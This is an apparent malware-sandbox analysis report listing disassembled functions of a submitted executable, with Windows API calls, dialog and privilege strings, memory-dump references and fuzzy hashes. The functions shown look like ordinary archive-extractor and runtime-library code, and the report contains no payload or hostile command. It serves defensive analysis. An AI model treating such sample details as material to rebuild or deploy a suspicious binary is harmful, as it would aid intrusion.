                                                                                                                                  • _free.LIBCMT ref: 008C8083
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _free$FileModuleName
                                                                                                                                  • String ID: C:\Users\user\Desktop\544WP3NHaP.exe
                                                                                                                                  • API String ID: 2506810119-2042405535
                                                                                                                                  • Opcode ID: 51313a5826cc7251514c9e5f3b2f0b19eccb63fd65392a206cffdcac7836641b
                                                                                                                                  • Instruction ID: 8bc96d358f97b980fc10f756db48952725886504cc1eafb7e4ca381923b05ae4
                                                                                                                                  • Opcode Fuzzy Hash: 51313a5826cc7251514c9e5f3b2f0b19eccb63fd65392a206cffdcac7836641b
                                                                                                                                  • Instruction Fuzzy Hash: E7317A71A44618EFDB21DB999885EAEBBB8FB95310F1040AEF904D7211DB71CA44CB62
                                                                                                                                  Function 008C31D6 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 008C31FB
                                                                                                                                  • _abort.LIBCMT ref: 008C3306
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: EncodePointer_abort
                                                                                                                                  • String ID: MOC$RCC
                                                                                                                                  • API String ID: 948111806-2084237596
                                                                                                                                  • Opcode ID: 6073dbc74c230fcb30d8c06a4088e242ccb2214e3cba20ebe68c4b45371599dc
                                                                                                                                  • Instruction ID: d41e46c20468633dadf84af8bdddd7c6a4b64027ff21f91c02efff3b4e7b4aeb
                                                                                                                                  • Opcode Fuzzy Hash: 6073dbc74c230fcb30d8c06a4088e242ccb2214e3cba20ebe68c4b45371599dc
                                                                                                                                  • Instruction Fuzzy Hash: 35414472900209AFCF15DFA8D881FEEBBB5FF08305F188059F909A6261D235EA51DB91
                                                                                                                                  Function 008A7401 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 103COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog.LIBCMT ref: 008A7406
                                                                                                                                    • Part of subcall function 008A3BBA: __EH_prolog.LIBCMT ref: 008A3BBF
                                                                                                                                  • GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 008A74CD
                                                                                                                                    • Part of subcall function 008A7A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 008A7AAB
                                                                                                                                    • Part of subcall function 008A7A9C: GetLastError.KERNEL32 ref: 008A7AF1
                                                                                                                                    • Part of subcall function 008A7A9C: CloseHandle.KERNEL32(?), ref: 008A7B00
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
                                                                                                                                  • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                                                                                                                  • API String ID: 3813983858-639343689
                                                                                                                                  • Opcode ID: 82a35af885c961202d463536bb9ea3e2ffaff76e6b00885f089fd3cc4d898cf3
                                                                                                                                  • Instruction ID: 8bd43b617d4e20570ea93ce83d446cc0d80bd41f09d74a731e26425c107f40c9
                                                                                                                                  • Opcode Fuzzy Hash: 82a35af885c961202d463536bb9ea3e2ffaff76e6b00885f089fd3cc4d898cf3
                                                                                                                                  • Instruction Fuzzy Hash: E831A171D04258AEEF11EBA89C45BEE7BB9FF0A300F044015F505E7682DB748A45DB62
                                                                                                                                  Function 008BAD10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 008A1316: GetDlgItem.USER32(00000000,00003021), ref: 008A135A
                                                                                                                                    • Part of subcall function 008A1316: SetWindowTextW.USER32(00000000,008D35F4), ref: 008A1370
                                                                                                                                  • EndDialog.USER32(?,00000001), ref: 008BAD98
                                                                                                                                  • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 008BADAD
                                                                                                                                  • SetDlgItemTextW.USER32(?,00000066,?), ref: 008BADC2
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ItemText$DialogWindow
                                                                                                                                  • String ID: ASKNEXTVOL
                                                                                                                                  • API String ID: 445417207-3402441367
                                                                                                                                  • Opcode ID: 7bf182889e807c9f7ccfb71c1955f4683b2c28e404077bc34c7c1ccfc9ce5593
                                                                                                                                  • Instruction ID: ed847096567b087a7c0d7ff9f4beb70e342402f1228f1eef1ddfde2f02dc1666
                                                                                                                                  • Opcode Fuzzy Hash: 7bf182889e807c9f7ccfb71c1955f4683b2c28e404077bc34c7c1ccfc9ce5593
                                                                                                                                  • Instruction Fuzzy Hash: AA11B132244210BFE6158F68DC49FEA776EFB4B742F484400F241EB6A0C7629945A722
                                                                                                                                  Function 008AD8EC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __fprintf_l.LIBCMT ref: 008AD954
                                                                                                                                  • _strncpy.LIBCMT ref: 008AD99A
                                                                                                                                    • Part of subcall function 008B1DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,008E1030,00000200,008AD928,00000000,?,00000050,008E1030), ref: 008B1DC4
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ByteCharMultiWide__fprintf_l_strncpy
                                                                                                                                  • String ID: $%s$@%s
                                                                                                                                  • API String ID: 562999700-834177443
                                                                                                                                  • Opcode ID: 8916931986f79977821045b38e5d793a31739dff145e2bc687a284be49288540
                                                                                                                                  • Instruction ID: 1b4c68dcb5ca8f9c78f68dda4390af301c167c90acf155268acf9b395d57ef70
                                                                                                                                  • Opcode Fuzzy Hash: 8916931986f79977821045b38e5d793a31739dff145e2bc687a284be49288540
                                                                                                                                  • Instruction Fuzzy Hash: 2E21817254034CAAEB20EEA4CC05FDF7BE8FB06304F080522F911D6AA2E271D659CB52
                                                                                                                                  Function 008B0E46 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,008AAC5A,00000008,?,00000000,?,008AD22D,?,00000000), ref: 008B0E85
                                                                                                                                  • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,008AAC5A,00000008,?,00000000,?,008AD22D,?,00000000), ref: 008B0E8F
                                                                                                                                  • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,008AAC5A,00000008,?,00000000,?,008AD22D,?,00000000), ref: 008B0E9F
                                                                                                                                  Strings
                                                                                                                                  • Thread pool initialization failed., xrefs: 008B0EB7
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                                                                                                  • String ID: Thread pool initialization failed.
                                                                                                                                  • API String ID: 3340455307-2182114853
                                                                                                                                  • Opcode ID: f805ccbd6f9da10fd232e8830c8e9d35a5831c87ed917a171f418cc165fc69cd
                                                                                                                                  • Instruction ID: c4521e34c5fa133bca2942d39782977113ac6f386045b960c3d16667bfa1cade
                                                                                                                                  • Opcode Fuzzy Hash: f805ccbd6f9da10fd232e8830c8e9d35a5831c87ed917a171f418cc165fc69cd
                                                                                                                                  • Instruction Fuzzy Hash: 701151B16407099FD3215F6A9C849A7FBECFB55754F14492EF1DAC2300D671A9408B50
                                                                                                                                  Function 008BB270 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 008A1316: GetDlgItem.USER32(00000000,00003021), ref: 008A135A
                                                                                                                                    • Part of subcall function 008A1316: SetWindowTextW.USER32(00000000,008D35F4), ref: 008A1370
                                                                                                                                  • EndDialog.USER32(?,00000001), ref: 008BB2BE
                                                                                                                                  • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 008BB2D6
                                                                                                                                  • SetDlgItemTextW.USER32(?,00000067,?), ref: 008BB304
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ItemText$DialogWindow
                                                                                                                                  • String ID: GETPASSWORD1
                                                                                                                                  • API String ID: 445417207-3292211884
                                                                                                                                  • Opcode ID: 19558ab8a47836612ddb651902b35295febd29eb3800f5a8e7a37d1923caa7b4
                                                                                                                                  • Instruction ID: 99b97c9a78f8072c67bfd397a3f95d7ced721fd97ab4f3505201fe3f9cc1345f
                                                                                                                                  • Opcode Fuzzy Hash: 19558ab8a47836612ddb651902b35295febd29eb3800f5a8e7a37d1923caa7b4
                                                                                                                                  • Instruction Fuzzy Hash: 0211A132904118BAEB219AA89D49FFF3BACFF1A700F004021FA45F7690C7E59A4597A1
                                                                                                                                  Function 008BDCDD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: RENAMEDLG$REPLACEFILEDLG
                                                                                                                                  • API String ID: 0-56093855
                                                                                                                                  • Opcode ID: 90ef5b21acc81d269b25a15fbd46e1b28da002570a2b463517a840b66eae2558
                                                                                                                                  • Instruction ID: 1d95c733044f6b49c584f4a21364389b5939cc6cb5da2e56284158209563c529
                                                                                                                                  • Opcode Fuzzy Hash: 90ef5b21acc81d269b25a15fbd46e1b28da002570a2b463517a840b66eae2558
                                                                                                                                  • Instruction Fuzzy Hash: D301B136604389FFDB118FA4FC84AAA7BA8F708348B140026F949C7371E6308850EBA0
                                                                                                                                  Function 008C9A1E Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: __alldvrm$_strrchr
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1036877536-0
                                                                                                                                  • Opcode ID: 15e7b98f52cb345e5770fd34cbf54b95dbf5428e1727e1497290f0e3bad33655
                                                                                                                                  • Instruction ID: a7c9f85ab67d1f4ea5601e0fa595e2dbe649d5acb5f6906ff9089f8551e71ea0
                                                                                                                                  • Opcode Fuzzy Hash: 15e7b98f52cb345e5770fd34cbf54b95dbf5428e1727e1497290f0e3bad33655
                                                                                                                                  • Instruction Fuzzy Hash: 1DA1247290069A9FEB218E28C895BAABBF5FF51310F2841EDE5C6DB281C638DD41C751
                                                                                                                                  Function 008AA354 Relevance: 6.1, APIs: 4, Instructions: 127filetimeCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000800,?,008A7F69,?,?,?), ref: 008AA3FA
                                                                                                                                  • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,?,00000800,?,008A7F69,?), ref: 008AA43E
                                                                                                                                  • SetFileTime.KERNEL32(?,00000800,?,00000000,?,?,00000800,?,008A7F69,?,?,?,?,?,?,?), ref: 008AA4BF
                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,00000800,?,008A7F69,?,?,?,?,?,?,?,?,?,?), ref: 008AA4C6
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$Create$CloseHandleTime
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2287278272-0
                                                                                                                                  • Opcode ID: 1c26c3d3b014892224dca3f09c006e94a61694710d19add8f1cf74ac0fdf0558
                                                                                                                                  • Instruction ID: 6d6a795b7f9eeefd70a09d0fb1fa74e86b3bd06d83d29dea598b5d8744fd1704
                                                                                                                                  • Opcode Fuzzy Hash: 1c26c3d3b014892224dca3f09c006e94a61694710d19add8f1cf74ac0fdf0558
                                                                                                                                  • Instruction Fuzzy Hash: C041CF302483819AEB35DF24DC55BEEBBE4FB8A700F040919B5D1D3A81D7A49A48DB53
                                                                                                                                  Function 008A1100 Relevance: 6.1, APIs: 4, Instructions: 119COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _wcslen
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 176396367-0
                                                                                                                                  • Opcode ID: f99b134d03be5bf961fab457010edbad7878866196ba8d98a70439985968a1f6
                                                                                                                                  • Instruction ID: 5ba0d0a45863d6b0ea4f968e1ae8ac256b6b4fea6a81045b8a9441af1e91b35e
                                                                                                                                  • Opcode Fuzzy Hash: f99b134d03be5bf961fab457010edbad7878866196ba8d98a70439985968a1f6
                                                                                                                                  • Instruction Fuzzy Hash: 754180719016699BDB21DF688C4AAEFBBBCFF01310F004129F945F7256DA30EE458BA5
                                                                                                                                  Function 008CC988 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,008C91E0,?,00000000,?,00000001,?,?,00000001,008C91E0,?), ref: 008CC9D5
                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 008CCA5E
                                                                                                                                  • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,008C6CBE,?), ref: 008CCA70
                                                                                                                                  • __freea.LIBCMT ref: 008CCA79
                                                                                                                                    • Part of subcall function 008C8E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,008CCA2C,00000000,?,008C6CBE,?,00000008,?,008C91E0,?,?,?), ref: 008C8E38
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2652629310-0
                                                                                                                                  • Opcode ID: def028b912ef4b1115aaf0dfa682b4cda12d9d9a0aa47cccad01ca5040a24422
                                                                                                                                  • Instruction ID: 4f54cb8d1d24fe0d0dbaafd836e023e6a9c75e3a4bff3b2d12a9d272c2af530d
                                                                                                                                  • Opcode Fuzzy Hash: def028b912ef4b1115aaf0dfa682b4cda12d9d9a0aa47cccad01ca5040a24422
                                                                                                                                  • Instruction Fuzzy Hash: CE31ADB2A0021AABDF25DF69DC55EAE7BB5FB01310B04422DFC08E6251EB35CD50CB91
                                                                                                                                  Function 008BA663 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetDC.USER32(00000000), ref: 008BA666
                                                                                                                                  • GetDeviceCaps.GDI32(00000000,00000058), ref: 008BA675
                                                                                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 008BA683
                                                                                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 008BA691
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CapsDevice$Release
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1035833867-0
                                                                                                                                  • Opcode ID: ba84e96a52a17bfb6c57fc0d6040fb1629d812b8e2e561fb699adb96602cc9a7
                                                                                                                                  • Instruction ID: 899329c03bd36d9f235889c4f51c3323815a5150bac5c50120f541277fa1f4bb
                                                                                                                                  • Opcode Fuzzy Hash: ba84e96a52a17bfb6c57fc0d6040fb1629d812b8e2e561fb699adb96602cc9a7
                                                                                                                                  • Instruction Fuzzy Hash: 4FE0EC71967721EFD2615B60AC4DB9B3E68FF15B52F018101FA09AA1D0DB6486009BE5
                                                                                                                                  Function 008BA80C Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 237COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 008BA699: GetDC.USER32(00000000), ref: 008BA69D
                                                                                                                                    • Part of subcall function 008BA699: GetDeviceCaps.GDI32(00000000,0000000C), ref: 008BA6A8
                                                                                                                                    • Part of subcall function 008BA699: ReleaseDC.USER32(00000000,00000000), ref: 008BA6B3
                                                                                                                                  • GetObjectW.GDI32(?,00000018,?), ref: 008BA83C
